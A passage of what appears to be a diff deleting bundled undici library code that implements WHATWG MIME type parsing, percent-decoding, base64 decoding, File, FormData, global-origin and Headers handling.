Advance position by 1. - position.position++ - } - - // 3. Return result. - return result -} - -/** - * A faster collectASequenceOfCodePoints that only works when comparing a single character. - * @param {string} char - * @param {string} input - * @param {{ position: number }} position - */ -function collectASequenceOfCodePointsFast (char, input, position) { - const idx = input.indexOf(char, position.position) - const start = position.position - - if (idx === -1) { - position.position = input.length - return input.slice(start) - } - - position.position = idx - return input.slice(start, position.position) -} - -// https://url.spec.whatwg.org/#string-percent-decode -/** @param {string} input */ -function stringPercentDecode (input) { - // 1. Let bytes be the UTF-8 encoding of input. - const bytes = encoder.encode(input) - - // 2. Return the percent-decoding of bytes. - return percentDecode(bytes) -} - -// https://url.spec.whatwg.org/#percent-decode -/** @param {Uint8Array} input */ -function percentDecode (input) { - // 1. Let output be an empty byte sequence. - /** @type {number[]} */ - const output = [] - - // 2. For each byte byte in input: - for (let i = 0; i < input.length; i++) { - const byte = input[i] - - // 1. If byte is not 0x25 (%), then append byte to output. - if (byte !== 0x25) { - output.push(byte) - - // 2. Otherwise, if byte is 0x25 (%) and the next two bytes - // after byte in input are not in the ranges - // 0x30 (0) to 0x39 (9), 0x41 (A) to 0x46 (F), - // and 0x61 (a) to 0x66 (f), all inclusive, append byte - // to output. - } else if ( - byte === 0x25 && - !/^[0-9A-Fa-f]{2}$/i.test(String.fromCharCode(input[i + 1], input[i + 2])) - ) { - output.push(0x25) - - // 3. Otherwise: - } else { - // 1. Let bytePoint be the two bytes after byte in input, - // decoded, and then interpreted as hexadecimal number. - const nextTwoBytes = String.fromCharCode(input[i + 1], input[i + 2]) - const bytePoint = Number.parseInt(nextTwoBytes, 16) - - // 2. 
Append a byte whose value is bytePoint to output. - output.push(bytePoint) - - // 3. Skip the next two bytes in input. - i += 2 - } - } - - // 3. Return output. - return Uint8Array.from(output) -} - -// https://mimesniff.spec.whatwg.org/#parse-a-mime-type -/** @param {string} input */ -function parseMIMEType (input) { - // 1. Remove any leading and trailing HTTP whitespace - // from input. - input = removeHTTPWhitespace(input, true, true) - - // 2. Let position be a position variable for input, - // initially pointing at the start of input. - const position = { position: 0 } - - // 3. Let type be the result of collecting a sequence - // of code points that are not U+002F (/) from - // input, given position. - const type = collectASequenceOfCodePointsFast( - '/', - input, - position - ) - - // 4. If type is the empty string or does not solely - // contain HTTP token code points, then return failure. - // https://mimesniff.spec.whatwg.org/#http-token-code-point - if (type.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(type)) { - return 'failure' - } - - // 5. If position is past the end of input, then return - // failure - if (position.position > input.length) { - return 'failure' - } - - // 6. Advance position by 1. (This skips past U+002F (/).) - position.position++ - - // 7. Let subtype be the result of collecting a sequence of - // code points that are not U+003B (;) from input, given - // position. - let subtype = collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 8. Remove any trailing HTTP whitespace from subtype. - subtype = removeHTTPWhitespace(subtype, false, true) - - // 9. If subtype is the empty string or does not solely - // contain HTTP token code points, then return failure. - if (subtype.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(subtype)) { - return 'failure' - } - - const typeLowercase = type.toLowerCase() - const subtypeLowercase = subtype.toLowerCase() - - // 10. 
Let mimeType be a new MIME type record whose type - // is type, in ASCII lowercase, and subtype is subtype, - // in ASCII lowercase. - // https://mimesniff.spec.whatwg.org/#mime-type - const mimeType = { - type: typeLowercase, - subtype: subtypeLowercase, - /** @type {Map} */ - parameters: new Map(), - // https://mimesniff.spec.whatwg.org/#mime-type-essence - essence: `${typeLowercase}/${subtypeLowercase}` - } - - // 11. While position is not past the end of input: - while (position.position < input.length) { - // 1. Advance position by 1. (This skips past U+003B (;).) - position.position++ - - // 2. Collect a sequence of code points that are HTTP - // whitespace from input given position. - collectASequenceOfCodePoints( - // https://fetch.spec.whatwg.org/#http-whitespace - char => HTTP_WHITESPACE_REGEX.test(char), - input, - position - ) - - // 3. Let parameterName be the result of collecting a - // sequence of code points that are not U+003B (;) - // or U+003D (=) from input, given position. - let parameterName = collectASequenceOfCodePoints( - (char) => char !== ';' && char !== '=', - input, - position - ) - - // 4. Set parameterName to parameterName, in ASCII - // lowercase. - parameterName = parameterName.toLowerCase() - - // 5. If position is not past the end of input, then: - if (position.position < input.length) { - // 1. If the code point at position within input is - // U+003B (;), then continue. - if (input[position.position] === ';') { - continue - } - - // 2. Advance position by 1. (This skips past U+003D (=).) - position.position++ - } - - // 6. If position is past the end of input, then break. - if (position.position > input.length) { - break - } - - // 7. Let parameterValue be null. - let parameterValue = null - - // 8. If the code point at position within input is - // U+0022 ("), then: - if (input[position.position] === '"') { - // 1. 
Set parameterValue to the result of collecting - // an HTTP quoted string from input, given position - // and the extract-value flag. - parameterValue = collectAnHTTPQuotedString(input, position, true) - - // 2. Collect a sequence of code points that are not - // U+003B (;) from input, given position. - collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 9. Otherwise: - } else { - // 1. Set parameterValue to the result of collecting - // a sequence of code points that are not U+003B (;) - // from input, given position. - parameterValue = collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 2. Remove any trailing HTTP whitespace from parameterValue. - parameterValue = removeHTTPWhitespace(parameterValue, false, true) - - // 3. If parameterValue is the empty string, then continue. - if (parameterValue.length === 0) { - continue - } - } - - // 10. If all of the following are true - // - parameterName is not the empty string - // - parameterName solely contains HTTP token code points - // - parameterValue solely contains HTTP quoted-string token code points - // - mimeType’s parameters[parameterName] does not exist - // then set mimeType’s parameters[parameterName] to parameterValue. - if ( - parameterName.length !== 0 && - HTTP_TOKEN_CODEPOINTS.test(parameterName) && - (parameterValue.length === 0 || HTTP_QUOTED_STRING_TOKENS.test(parameterValue)) && - !mimeType.parameters.has(parameterName) - ) { - mimeType.parameters.set(parameterName, parameterValue) - } - } - - // 12. Return mimeType. - return mimeType -} - -// https://infra.spec.whatwg.org/#forgiving-base64-decode -/** @param {string} data */ -function forgivingBase64 (data) { - // 1. Remove all ASCII whitespace from data. - data = data.replace(/[\u0009\u000A\u000C\u000D\u0020]/g, '') // eslint-disable-line - - // 2. If data’s code point length divides by 4 leaving - // no remainder, then: - if (data.length % 4 === 0) { - // 1. 
If data ends with one or two U+003D (=) code points, - // then remove them from data. - data = data.replace(/=?=$/, '') - } - - // 3. If data’s code point length divides by 4 leaving - // a remainder of 1, then return failure. - if (data.length % 4 === 1) { - return 'failure' - } - - // 4. If data contains a code point that is not one of - // U+002B (+) - // U+002F (/) - // ASCII alphanumeric - // then return failure. - if (/[^+/0-9A-Za-z]/.test(data)) { - return 'failure' - } - - const binary = atob(data) - const bytes = new Uint8Array(binary.length) - - for (let byte = 0; byte < binary.length; byte++) { - bytes[byte] = binary.charCodeAt(byte) - } - - return bytes -} - -// https://fetch.spec.whatwg.org/#collect-an-http-quoted-string -// tests: https://fetch.spec.whatwg.org/#example-http-quoted-string -/** - * @param {string} input - * @param {{ position: number }} position - * @param {boolean?} extractValue - */ -function collectAnHTTPQuotedString (input, position, extractValue) { - // 1. Let positionStart be position. - const positionStart = position.position - - // 2. Let value be the empty string. - let value = '' - - // 3. Assert: the code point at position within input - // is U+0022 ("). - assert(input[position.position] === '"') - - // 4. Advance position by 1. - position.position++ - - // 5. While true: - while (true) { - // 1. Append the result of collecting a sequence of code points - // that are not U+0022 (") or U+005C (\) from input, given - // position, to value. - value += collectASequenceOfCodePoints( - (char) => char !== '"' && char !== '\\', - input, - position - ) - - // 2. If position is past the end of input, then break. - if (position.position >= input.length) { - break - } - - // 3. Let quoteOrBackslash be the code point at position within - // input. - const quoteOrBackslash = input[position.position] - - // 4. Advance position by 1. - position.position++ - - // 5. 
If quoteOrBackslash is U+005C (\), then: - if (quoteOrBackslash === '\\') { - // 1. If position is past the end of input, then append - // U+005C (\) to value and break. - if (position.position >= input.length) { - value += '\\' - break - } - - // 2. Append the code point at position within input to value. - value += input[position.position] - - // 3. Advance position by 1. - position.position++ - - // 6. Otherwise: - } else { - // 1. Assert: quoteOrBackslash is U+0022 ("). - assert(quoteOrBackslash === '"') - - // 2. Break. - break - } - } - - // 6. If the extract-value flag is set, then return value. - if (extractValue) { - return value - } - - // 7. Return the code points from positionStart to position, - // inclusive, within input. - return input.slice(positionStart, position.position) -} - -/** - * @see https://mimesniff.spec.whatwg.org/#serialize-a-mime-type - */ -function serializeAMimeType (mimeType) { - assert(mimeType !== 'failure') - const { parameters, essence } = mimeType - - // 1. Let serialization be the concatenation of mimeType’s - // type, U+002F (/), and mimeType’s subtype. - let serialization = essence - - // 2. For each name → value of mimeType’s parameters: - for (let [name, value] of parameters.entries()) { - // 1. Append U+003B (;) to serialization. - serialization += ';' - - // 2. Append name to serialization. - serialization += name - - // 3. Append U+003D (=) to serialization. - serialization += '=' - - // 4. If value does not solely contain HTTP token code - // points or value is the empty string, then: - if (!HTTP_TOKEN_CODEPOINTS.test(value)) { - // 1. Precede each occurence of U+0022 (") or - // U+005C (\) in value with U+005C (\). - value = value.replace(/(\\|")/g, '\\$1') - - // 2. Prepend U+0022 (") to value. - value = '"' + value - - // 3. Append U+0022 (") to value. - value += '"' - } - - // 5. Append value to serialization. - serialization += value - } - - // 3. Return serialization. 
- return serialization -} - -/** - * @see https://fetch.spec.whatwg.org/#http-whitespace - * @param {string} char - */ -function isHTTPWhiteSpace (char) { - return char === '\r' || char === '\n' || char === '\t' || char === ' ' -} - -/** - * @see https://fetch.spec.whatwg.org/#http-whitespace - * @param {string} str - */ -function removeHTTPWhitespace (str, leading = true, trailing = true) { - let lead = 0 - let trail = str.length - 1 - - if (leading) { - for (; lead < str.length && isHTTPWhiteSpace(str[lead]); lead++); - } - - if (trailing) { - for (; trail > 0 && isHTTPWhiteSpace(str[trail]); trail--); - } - - return str.slice(lead, trail + 1) -} - -/** - * @see https://infra.spec.whatwg.org/#ascii-whitespace - * @param {string} char - */ -function isASCIIWhitespace (char) { - return char === '\r' || char === '\n' || char === '\t' || char === '\f' || char === ' ' -} - -/** - * @see https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace - */ -function removeASCIIWhitespace (str, leading = true, trailing = true) { - let lead = 0 - let trail = str.length - 1 - - if (leading) { - for (; lead < str.length && isASCIIWhitespace(str[lead]); lead++); - } - - if (trailing) { - for (; trail > 0 && isASCIIWhitespace(str[trail]); trail--); - } - - return str.slice(lead, trail + 1) -} - -module.exports = { - dataURLProcessor, - URLSerializer, - collectASequenceOfCodePoints, - collectASequenceOfCodePointsFast, - stringPercentDecode, - parseMIMEType, - collectAnHTTPQuotedString, - serializeAMimeType -} - - -/***/ }), - -/***/ 8511: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Blob, File: NativeFile } = __nccwpck_require__(4300) -const { types } = __nccwpck_require__(3837) -const { kState } = __nccwpck_require__(5861) -const { isBlobLike } = __nccwpck_require__(2538) -const { webidl } = __nccwpck_require__(1744) -const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) -const { 
kEnumerableProperty } = __nccwpck_require__(3983) -const encoder = new TextEncoder() - -class File extends Blob { - constructor (fileBits, fileName, options = {}) { - // The File constructor is invoked with two or three parameters, depending - // on whether the optional dictionary parameter is used. When the File() - // constructor is invoked, user agents must run the following steps: - webidl.argumentLengthCheck(arguments, 2, { header: 'File constructor' }) - - fileBits = webidl.converters['sequence'](fileBits) - fileName = webidl.converters.USVString(fileName) - options = webidl.converters.FilePropertyBag(options) - - // 1. Let bytes be the result of processing blob parts given fileBits and - // options. - // Note: Blob handles this for us - - // 2. Let n be the fileName argument to the constructor. - const n = fileName - - // 3. Process FilePropertyBag dictionary argument by running the following - // substeps: - - // 1. If the type member is provided and is not the empty string, let t - // be set to the type dictionary member. If t contains any characters - // outside the range U+0020 to U+007E, then set t to the empty string - // and return from these substeps. - // 2. Convert every character in t to ASCII lowercase. - let t = options.type - let d - - // eslint-disable-next-line no-labels - substep: { - if (t) { - t = parseMIMEType(t) - - if (t === 'failure') { - t = '' - // eslint-disable-next-line no-labels - break substep - } - - t = serializeAMimeType(t).toLowerCase() - } - - // 3. If the lastModified member is provided, let d be set to the - // lastModified dictionary member. If it is not provided, set d to the - // current date and time represented as the number of milliseconds since - // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). - d = options.lastModified - } - - // 4. Return a new File object F such that: - // F refers to the bytes byte sequence. - // F.size is set to the number of total bytes in bytes. - // F.name is set to n. 
- // F.type is set to t. - // F.lastModified is set to d. - - super(processBlobParts(fileBits, options), { type: t }) - this[kState] = { - name: n, - lastModified: d, - type: t - } - } - - get name () { - webidl.brandCheck(this, File) - - return this[kState].name - } - - get lastModified () { - webidl.brandCheck(this, File) - - return this[kState].lastModified - } - - get type () { - webidl.brandCheck(this, File) - - return this[kState].type - } -} - -class FileLike { - constructor (blobLike, fileName, options = {}) { - // TODO: argument idl type check - - // The File constructor is invoked with two or three parameters, depending - // on whether the optional dictionary parameter is used. When the File() - // constructor is invoked, user agents must run the following steps: - - // 1. Let bytes be the result of processing blob parts given fileBits and - // options. - - // 2. Let n be the fileName argument to the constructor. - const n = fileName - - // 3. Process FilePropertyBag dictionary argument by running the following - // substeps: - - // 1. If the type member is provided and is not the empty string, let t - // be set to the type dictionary member. If t contains any characters - // outside the range U+0020 to U+007E, then set t to the empty string - // and return from these substeps. - // TODO - const t = options.type - - // 2. Convert every character in t to ASCII lowercase. - // TODO - - // 3. If the lastModified member is provided, let d be set to the - // lastModified dictionary member. If it is not provided, set d to the - // current date and time represented as the number of milliseconds since - // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). - const d = options.lastModified ?? Date.now() - - // 4. Return a new File object F such that: - // F refers to the bytes byte sequence. - // F.size is set to the number of total bytes in bytes. - // F.name is set to n. - // F.type is set to t. - // F.lastModified is set to d. 
- - this[kState] = { - blobLike, - name: n, - type: t, - lastModified: d - } - } - - stream (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.stream(...args) - } - - arrayBuffer (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.arrayBuffer(...args) - } - - slice (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.slice(...args) - } - - text (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.text(...args) - } - - get size () { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.size - } - - get type () { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.type - } - - get name () { - webidl.brandCheck(this, FileLike) - - return this[kState].name - } - - get lastModified () { - webidl.brandCheck(this, FileLike) - - return this[kState].lastModified - } - - get [Symbol.toStringTag] () { - return 'File' - } -} - -Object.defineProperties(File.prototype, { - [Symbol.toStringTag]: { - value: 'File', - configurable: true - }, - name: kEnumerableProperty, - lastModified: kEnumerableProperty -}) - -webidl.converters.Blob = webidl.interfaceConverter(Blob) - -webidl.converters.BlobPart = function (V, opts) { - if (webidl.util.Type(V) === 'Object') { - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if ( - ArrayBuffer.isView(V) || - types.isAnyArrayBuffer(V) - ) { - return webidl.converters.BufferSource(V, opts) - } - } - - return webidl.converters.USVString(V, opts) -} - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.BlobPart -) - -// https://www.w3.org/TR/FileAPI/#dfn-FilePropertyBag -webidl.converters.FilePropertyBag = webidl.dictionaryConverter([ - { - key: 'lastModified', - converter: webidl.converters['long long'], - get defaultValue () { - return Date.now() - } - }, - { - key: 'type', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { 
- key: 'endings', - converter: (value) => { - value = webidl.converters.DOMString(value) - value = value.toLowerCase() - - if (value !== 'native') { - value = 'transparent' - } - - return value - }, - defaultValue: 'transparent' - } -]) - -/** - * @see https://www.w3.org/TR/FileAPI/#process-blob-parts - * @param {(NodeJS.TypedArray|Blob|string)[]} parts - * @param {{ type: string, endings: string }} options - */ -function processBlobParts (parts, options) { - // 1. Let bytes be an empty sequence of bytes. - /** @type {NodeJS.TypedArray[]} */ - const bytes = [] - - // 2. For each element in parts: - for (const element of parts) { - // 1. If element is a USVString, run the following substeps: - if (typeof element === 'string') { - // 1. Let s be element. - let s = element - - // 2. If the endings member of options is "native", set s - // to the result of converting line endings to native - // of element. - if (options.endings === 'native') { - s = convertLineEndingsNative(s) - } - - // 3. Append the result of UTF-8 encoding s to bytes. - bytes.push(encoder.encode(s)) - } else if ( - types.isAnyArrayBuffer(element) || - types.isTypedArray(element) - ) { - // 2. If element is a BufferSource, get a copy of the - // bytes held by the buffer source, and append those - // bytes to bytes. - if (!element.buffer) { // ArrayBuffer - bytes.push(new Uint8Array(element)) - } else { - bytes.push( - new Uint8Array(element.buffer, element.byteOffset, element.byteLength) - ) - } - } else if (isBlobLike(element)) { - // 3. If element is a Blob, append the bytes it represents - // to bytes. - bytes.push(element) - } - } - - // 3. Return bytes. - return bytes -} - -/** - * @see https://www.w3.org/TR/FileAPI/#convert-line-endings-to-native - * @param {string} s - */ -function convertLineEndingsNative (s) { - // 1. Let native line ending be be the code point U+000A LF. - let nativeLineEnding = '\n' - - // 2. 
If the underlying platform’s conventions are to - // represent newlines as a carriage return and line feed - // sequence, set native line ending to the code point - // U+000D CR followed by the code point U+000A LF. - if (process.platform === 'win32') { - nativeLineEnding = '\r\n' - } - - return s.replace(/\r?\n/g, nativeLineEnding) -} - -// If this function is moved to ./util.js, some tools (such as -// rollup) will warn about circular dependencies. See: -// https://github.com/nodejs/undici/issues/1629 -function isFileLike (object) { - return ( - (NativeFile && object instanceof NativeFile) || - object instanceof File || ( - object && - (typeof object.stream === 'function' || - typeof object.arrayBuffer === 'function') && - object[Symbol.toStringTag] === 'File' - ) - ) -} - -module.exports = { File, FileLike, isFileLike } - - -/***/ }), - -/***/ 2015: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { isBlobLike, toUSVString, makeIterator } = __nccwpck_require__(2538) -const { kState } = __nccwpck_require__(5861) -const { File: UndiciFile, FileLike, isFileLike } = __nccwpck_require__(8511) -const { webidl } = __nccwpck_require__(1744) -const { Blob, File: NativeFile } = __nccwpck_require__(4300) - -/** @type {globalThis['File']} */ -const File = NativeFile ?? UndiciFile - -// https://xhr.spec.whatwg.org/#formdata -class FormData { - constructor (form) { - if (form !== undefined) { - throw webidl.errors.conversionFailed({ - prefix: 'FormData constructor', - argument: 'Argument 1', - types: ['undefined'] - }) - } - - this[kState] = [] - } - - append (name, value, filename = undefined) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.append' }) - - if (arguments.length === 3 && !isBlobLike(value)) { - throw new TypeError( - "Failed to execute 'append' on 'FormData': parameter 2 is not of type 'Blob'" - ) - } - - // 1. Let value be value if given; otherwise blobValue. 
- - name = webidl.converters.USVString(name) - value = isBlobLike(value) - ? webidl.converters.Blob(value, { strict: false }) - : webidl.converters.USVString(value) - filename = arguments.length === 3 - ? webidl.converters.USVString(filename) - : undefined - - // 2. Let entry be the result of creating an entry with - // name, value, and filename if given. - const entry = makeEntry(name, value, filename) - - // 3. Append entry to this’s entry list. - this[kState].push(entry) - } - - delete (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.delete' }) - - name = webidl.converters.USVString(name) - - // The delete(name) method steps are to remove all entries whose name - // is name from this’s entry list. - this[kState] = this[kState].filter(entry => entry.name !== name) - } - - get (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.get' }) - - name = webidl.converters.USVString(name) - - // 1. If there is no entry whose name is name in this’s entry list, - // then return null. - const idx = this[kState].findIndex((entry) => entry.name === name) - if (idx === -1) { - return null - } - - // 2. Return the value of the first entry whose name is name from - // this’s entry list. - return this[kState][idx].value - } - - getAll (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.getAll' }) - - name = webidl.converters.USVString(name) - - // 1. If there is no entry whose name is name in this’s entry list, - // then return the empty list. - // 2. Return the values of all entries whose name is name, in order, - // from this’s entry list. 
- return this[kState] - .filter((entry) => entry.name === name) - .map((entry) => entry.value) - } - - has (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.has' }) - - name = webidl.converters.USVString(name) - - // The has(name) method steps are to return true if there is an entry - // whose name is name in this’s entry list; otherwise false. - return this[kState].findIndex((entry) => entry.name === name) !== -1 - } - - set (name, value, filename = undefined) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.set' }) - - if (arguments.length === 3 && !isBlobLike(value)) { - throw new TypeError( - "Failed to execute 'set' on 'FormData': parameter 2 is not of type 'Blob'" - ) - } - - // The set(name, value) and set(name, blobValue, filename) method steps - // are: - - // 1. Let value be value if given; otherwise blobValue. - - name = webidl.converters.USVString(name) - value = isBlobLike(value) - ? webidl.converters.Blob(value, { strict: false }) - : webidl.converters.USVString(value) - filename = arguments.length === 3 - ? toUSVString(filename) - : undefined - - // 2. Let entry be the result of creating an entry with name, value, and - // filename if given. - const entry = makeEntry(name, value, filename) - - // 3. If there are entries in this’s entry list whose name is name, then - // replace the first such entry with entry and remove the others. - const idx = this[kState].findIndex((entry) => entry.name === name) - if (idx !== -1) { - this[kState] = [ - ...this[kState].slice(0, idx), - entry, - ...this[kState].slice(idx + 1).filter((entry) => entry.name !== name) - ] - } else { - // 4. Otherwise, append entry to this’s entry list. 
- this[kState].push(entry) - } - } - - entries () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'key+value' - ) - } - - keys () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'key' - ) - } - - values () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'value' - ) - } - - /** - * @param {(value: string, key: string, self: FormData) => void} callbackFn - * @param {unknown} thisArg - */ - forEach (callbackFn, thisArg = globalThis) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.forEach' }) - - if (typeof callbackFn !== 'function') { - throw new TypeError( - "Failed to execute 'forEach' on 'FormData': parameter 1 is not of type 'Function'." - ) - } - - for (const [key, value] of this) { - callbackFn.apply(thisArg, [value, key, this]) - } - } -} - -FormData.prototype[Symbol.iterator] = FormData.prototype.entries - -Object.defineProperties(FormData.prototype, { - [Symbol.toStringTag]: { - value: 'FormData', - configurable: true - } -}) - -/** - * @see https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#create-an-entry - * @param {string} name - * @param {string|Blob} value - * @param {?string} filename - * @returns - */ -function makeEntry (name, value, filename) { - // 1. Set name to the result of converting name into a scalar value string. - // "To convert a string into a scalar value string, replace any surrogates - // with U+FFFD." - // see: https://nodejs.org/dist/latest-v18.x/docs/api/buffer.html#buftostringencoding-start-end - name = Buffer.from(name).toString('utf8') - - // 2. If value is a string, then set value to the result of converting - // value into a scalar value string. 
- if (typeof value === 'string') { - value = Buffer.from(value).toString('utf8') - } else { - // 3. Otherwise: - - // 1. If value is not a File object, then set value to a new File object, - // representing the same bytes, whose name attribute value is "blob" - if (!isFileLike(value)) { - value = value instanceof Blob - ? new File([value], 'blob', { type: value.type }) - : new FileLike(value, 'blob', { type: value.type }) - } - - // 2. If filename is given, then set value to a new File object, - // representing the same bytes, whose name attribute is filename. - if (filename !== undefined) { - /** @type {FilePropertyBag} */ - const options = { - type: value.type, - lastModified: value.lastModified - } - - value = (NativeFile && value instanceof NativeFile) || value instanceof UndiciFile - ? new File([value], filename, options) - : new FileLike(value, filename, options) - } - } - - // 4. Return an entry whose name is name and whose value is value. - return { name, value } -} - -module.exports = { FormData } - - -/***/ }), - -/***/ 1246: -/***/ ((module) => { - -"use strict"; - - -// In case of breaking changes, increase the version -// number to avoid conflicts. 
-const globalOrigin = Symbol.for('undici.globalOrigin.1') - -function getGlobalOrigin () { - return globalThis[globalOrigin] -} - -function setGlobalOrigin (newOrigin) { - if (newOrigin === undefined) { - Object.defineProperty(globalThis, globalOrigin, { - value: undefined, - writable: true, - enumerable: false, - configurable: false - }) - - return - } - - const parsedURL = new URL(newOrigin) - - if (parsedURL.protocol !== 'http:' && parsedURL.protocol !== 'https:') { - throw new TypeError(`Only http & https urls are allowed, received ${parsedURL.protocol}`) - } - - Object.defineProperty(globalThis, globalOrigin, { - value: parsedURL, - writable: true, - enumerable: false, - configurable: false - }) -} - -module.exports = { - getGlobalOrigin, - setGlobalOrigin -} - - -/***/ }), - -/***/ 554: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// https://github.com/Ethan-Arrowood/undici-fetch - - - -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const { kGuard } = __nccwpck_require__(5861) -const { kEnumerableProperty } = __nccwpck_require__(3983) -const { - makeIterator, - isValidHeaderName, - isValidHeaderValue -} = __nccwpck_require__(2538) -const { webidl } = __nccwpck_require__(1744) -const assert = __nccwpck_require__(9491) - -const kHeadersMap = Symbol('headers map') -const kHeadersSortedMap = Symbol('headers map sorted') - -/** - * @param {number} code - */ -function isHTTPWhiteSpaceCharCode (code) { - return code === 0x00a || code === 0x00d || code === 0x009 || code === 0x020 -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-header-value-normalize - * @param {string} potentialValue - */ -function headerValueNormalize (potentialValue) { - // To normalize a byte sequence potentialValue, remove - // any leading and trailing HTTP whitespace bytes from - // potentialValue. 
- let i = 0; let j = potentialValue.length - - while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(j - 1))) --j - while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(i))) ++i - - return i === 0 && j === potentialValue.length ? potentialValue : potentialValue.substring(i, j) -} - -function fill (headers, object) { - // To fill a Headers object headers with a given object object, run these steps: - - // 1. If object is a sequence, then for each header in object: - // Note: webidl conversion to array has already been done. - if (Array.isArray(object)) { - for (let i = 0; i < object.length; ++i) { - const header = object[i] - // 1. If header does not contain exactly two items, then throw a TypeError. - if (header.length !== 2) { - throw webidl.errors.exception({ - header: 'Headers constructor', - message: `expected name/value pair to be length 2, found ${header.length}.` - }) - } - - // 2. Append (header’s first item, header’s second item) to headers. - appendHeader(headers, header[0], header[1]) - } - } else if (typeof object === 'object' && object !== null) { - // Note: null should throw - - // 2. Otherwise, object is a record, then for each key → value in object, - // append (key, value) to headers - const keys = Object.keys(object) - for (let i = 0; i < keys.length; ++i) { - appendHeader(headers, keys[i], object[keys[i]]) - } - } else { - throw webidl.errors.conversionFailed({ - prefix: 'Headers constructor', - argument: 'Argument 1', - types: ['sequence>', 'record'] - }) - } -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-headers-append - */ -function appendHeader (headers, name, value) { - // 1. Normalize value. - value = headerValueNormalize(value) - - // 2. If name is not a header name or value is not a - // header value, then throw a TypeError. 
- if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.append', - value: name, - type: 'header name' - }) - } else if (!isValidHeaderValue(value)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.append', - value, - type: 'header value' - }) - } - - // 3. If headers’s guard is "immutable", then throw a TypeError. - // 4. Otherwise, if headers’s guard is "request" and name is a - // forbidden header name, return. - // Note: undici does not implement forbidden header names - if (headers[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (headers[kGuard] === 'request-no-cors') { - // 5. Otherwise, if headers’s guard is "request-no-cors": - // TODO - } - - // 6. Otherwise, if headers’s guard is "response" and name is a - // forbidden response-header name, return. - - // 7. Append (name, value) to headers’s header list. - return headers[kHeadersList].append(name, value) - - // 8. If headers’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from headers -} - -class HeadersList { - /** @type {[string, string][]|null} */ - cookies = null - - constructor (init) { - if (init instanceof HeadersList) { - this[kHeadersMap] = new Map(init[kHeadersMap]) - this[kHeadersSortedMap] = init[kHeadersSortedMap] - this.cookies = init.cookies === null ? null : [...init.cookies] - } else { - this[kHeadersMap] = new Map(init) - this[kHeadersSortedMap] = null - } - } - - // https://fetch.spec.whatwg.org/#header-list-contains - contains (name) { - // A header list list contains a header name name if list - // contains a header whose name is a byte-case-insensitive - // match for name. - name = name.toLowerCase() - - return this[kHeadersMap].has(name) - } - - clear () { - this[kHeadersMap].clear() - this[kHeadersSortedMap] = null - this.cookies = null - } - - // https://fetch.spec.whatwg.org/#concept-header-list-append - append (name, value) { - this[kHeadersSortedMap] = null - - // 1. 
If list contains name, then set name to the first such - // header’s name. - const lowercaseName = name.toLowerCase() - const exists = this[kHeadersMap].get(lowercaseName) - - // 2. Append (name, value) to list. - if (exists) { - const delimiter = lowercaseName === 'cookie' ? '; ' : ', ' - this[kHeadersMap].set(lowercaseName, { - name: exists.name, - value: `${exists.value}${delimiter}${value}` - }) - } else { - this[kHeadersMap].set(lowercaseName, { name, value }) - } - - if (lowercaseName === 'set-cookie') { - this.cookies ??= [] - this.cookies.push(value) - } - } - - // https://fetch.spec.whatwg.org/#concept-header-list-set - set (name, value) { - this[kHeadersSortedMap] = null - const lowercaseName = name.toLowerCase() - - if (lowercaseName === 'set-cookie') { - this.cookies = [value] - } - - // 1. If list contains name, then set the value of - // the first such header to value and remove the - // others. - // 2. Otherwise, append header (name, value) to list. - this[kHeadersMap].set(lowercaseName, { name, value }) - } - - // https://fetch.spec.whatwg.org/#concept-header-list-delete - delete (name) { - this[kHeadersSortedMap] = null - - name = name.toLowerCase() - - if (name === 'set-cookie') { - this.cookies = null - } - - this[kHeadersMap].delete(name) - } - - // https://fetch.spec.whatwg.org/#concept-header-list-get - get (name) { - const value = 